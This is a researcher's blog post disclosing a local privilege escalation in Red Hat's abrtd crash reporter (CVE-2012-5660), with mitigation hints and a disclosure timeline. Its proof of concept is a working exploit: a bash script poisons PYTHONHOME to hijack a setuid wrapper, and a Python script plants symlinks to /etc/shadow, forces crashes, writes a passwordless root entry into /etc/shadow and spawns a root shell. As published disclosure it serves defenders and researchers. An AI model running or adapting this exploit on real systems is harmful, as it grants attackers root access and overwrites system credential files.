martin carpenter / blog / RedHat abrtd local privilege escalation vulnerability

contact

blog

2022/01/31
determining password dump origin using n-grams

2015/07/01
escape from ansible

2015/06/24
solaris elfsign vulnerability

2014/10/22
metasploiting nrpe

2014/01/24
readable setuid cores in desktop ubuntu

2014/01/20
enlightenment sysactions vulnerability

redhat abrtd local privilege escalation vulnerability

2013/04/30

tags: abrtd redhat vulnerability CVE-2012-5660 CVE-2012-5659

Red Hat Linux's Automatic Bug Reporting Tool (or abrt) watches for system application or kernel crashes and then performs administrator configurable actions such as writing out a core file. (Ubuntu has something similar in the form of whoopsie).

Security conscious administrators should be aware that both of these tools include options to perform remote reporting of crashes.

I discovered a local privilege escalation in the abrtd daemon 2.0.8 of Red Hat Linux 6.3. Attacker requires only a local user account to gain root. Red Hat's bug report states that an attacker requires abrt user privilege but as we shall see this is easy to obtain. (Miloslav Trmač independently discovered this first part of the attack so there are two CVEs for this RHSA).

Overview of method

Obtain the abrt user privileges by abusing the environment in the SETUID wrapper. (Note this is already enough to read other users' core files).
Use these privileges to write (predictable) directory names into /var/spool/abrt, containing symlinks to sensitive files.
Make a known program crash a lot.
Wait for abrtd to come along (as root) and chown(2) those symlinks' targets to user abrt.
Use (1) again to write whatever we like into the chosen sensitive files.

I used /etc/shadow as a suitable example of a sensitive file, writing a single line into it to provide a root account with no password.

Observations / hints for mitigation

The hook wrapper /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache is SETUID user abrt and world-executable.
It calls a python script /usr/bin/abrt-action-install-debuginfo.
The wrapper doesn't sanitize the environment carefully enough. In fact it uses a blacklist. (Blacklists are number two on Marcus Ranum's fun list of The Six Dumbest Ideas in Computer Security). In particular this code doesn't sanitize PYTHONHOME, PYTHONPATH (and probably more that you can think of).

abrt-action-install-debuginfo-to-abrt-cache.c:main():

        /* Clear dangerous stuff from env */
        static const char forbid[] =
            "LD_LIBRARY_PATH" ""
            "LD_PRELOAD" ""
            "LD_TRACE_LOADED_OBJECTS" ""
            "LD_BIND_NOW" ""
            "LD_AOUT_LIBRARY_PATH" ""
            "LD_AOUT_PRELOAD" ""
            "LD_NOWARN" ""
            "LD_KEEPDIR" ""
        ;
        const char *p = forbid;
        do {
            unsetenv(p);
            p += strlen(p) + 1;
        } while (*p);

abrtd runs as root.
abrtd creates directories in /var/spool/abrtd with predictable names based on the TOD (granularity 1s) and PID (allocated sequentially in Red Hat by default).
If the directory cannot be created (exists) then abrtd tries again by appending .new to the directory name. If the .new directory exists it doesn't seem to care.
Files and directories are initially created as root.
abrtd then uses chown(2) to fix the ownership (rather than fchown(2)) so it follows symlinks.

abrt-hook-ccpp.c:main():

        strcpy(source_filename + source_base_ofs, "maps");
        strcpy(dest_base, FILENAME_MAPS);
        copy_file(source_filename, dest_filename, 0640);
        IGNORE_RESULT(chown(dest_filename, dd->dd_uid, dd->dd_gid));

Proof of concept

The top level shell script immediately below writes some python (in the second file sploit.py) into a local copy of the os.py library file, sets PYTHONHOME to point to it and calls the SETUID executable /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache.
The SETUID executable invokes the python script /usr/bin/abrt-action-install-debuginfo.
- This script loads the standard library from our munged copy via PYTHONHOME.
- Takes the current PID and time.
- Fills /var/spool/abrt (owned by user abrt) with directories with names like ccpp-2012-12-14-18:05:59-2424 (where the time in the directory name is the end (59th second) of the current minute) and with symlinks {maps,limits,open_fds} → /etc/shadow.
- Waits until end of the minute then crashes sleep(1) repeatedly by sending it SIGABRT, thus triggering abrtd.
abrtd will chown(2) the target of the symlinks (/etc/shadow) to user abrt.
We (as user abrt) can then overwrite shadow with our own data (a password-less root login entry) and invoke a root shell via su(1).
This is a timing attack so is sensitive to the local environment. You may need to tweak the attempts variable and sleep periods to get this to work.

#!/bin/bash

exe=/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
libdir=$PWD/lib64/python2.6

echo "Setting up fake python library in $libdir"
mkdir -p $libdir
rsync -a --exclude '*.py?' /usr/lib64/python2.6/* $libdir

echo "Munging $libdir/os.py"
cat >> $libdir/os.py << EOF
import posix # can't hit os.* from inside os
posix.unsetenv("PYTHONHOME") # done with fake lib
posix.system("$PWD/sploit.py")
posix._exit(0)
EOF

# Set PYTHONHOME to point to our munged libs
export PYTHONHOME=$PWD

# Run the wrapped python script, import munged libs
echo "Exploiting $exe"
ls -l $exe
exec $exe

This is the sploit.py script that does the actual work as the abrt user when the fake python os module is imported:

#!/usr/bin/python

import os
import pwd
import time
from subprocess import call

def get_time():
    now = time.localtime()
    print "Time now: " + time.strftime("%Y-%m-%d-%H:%M:%S", now)
    return now

def make_dir_and_links(dir):
    print "Making %s" % dir
    os.mkdir(dir)
    os.symlink("/etc/shadow", "%s/maps" % dir)
    os.symlink("/etc/shadow", "%s/limits" % dir)
    os.symlink("/etc/shadow", "%s/open_fds" % dir)

attempts = 256 # no of dirs/crashes to create

# Leave us some space (10s) to do the symlink stuffing
now = get_time()
while now.tm_sec > 49:
    time.sleep(1)
    now = get_time()

tstamp = time.strftime("%Y-%m-%d-%H:%M:59", now)
filepat = "/var/spool/abrt/ccpp-" + tstamp + "-%s"

print "\nMaking dirs and symlinks"
pid = os.getpid()
for i in range(pid, pid+attempts):
    dir = filepat % i
    make_dir_and_links(dir)
    make_dir_and_links(dir+".new")

# Perhaps we left too much time...
to_sleep = 58.9 - time.localtime().tm_sec
print "\nSleeping for %i seconds" % to_sleep
time.sleep(to_sleep)

print "\nCrashing"
for i in range(attempts):
    call("/bin/sleep 10 & /bin/kill -ABRT $!", shell=True)

abrt_uid = pwd.getpwnam("abrt").pw_uid
print "\nWaiting for abrt to own %s" % target
while (os.stat(target).st_uid != abrt_uid):
    time.sleep(1)

print "\nOverwriting /etc/shadow"
os.chmod("/etc/shadow", 0600)
f = file("/etc/shadow", "w")
f.write("root::::::::\n")
f.close()

print "\nInvoking /bin/bash as root"
os.unsetenv("DISPLAY") # else xauth
os.system("/bin/su -c /bin/bash")
os._exit(0)

timeline

2012/12/14 Reported to Red Hat security
2012/12/15 Confirmed received by Red Hat security
2012/12/18 Assigned bug #181635, Red Hat cannot reproduce issue
2012/12/19 I reproduced on clean install of RHEL Server 6.3 x86_64
2012/12/20 Confirmed by Red Hat security
2013/01/30 CVE-2012-5660 assigned and Red Hat bug report unembargoed
2013/01/31 RHSA-2013-0215

martin carpenter

contents

redhat abrtd local privilege escalation vulnerability

Overview of method

Observations / hints for mitigation

Proof of concept

timeline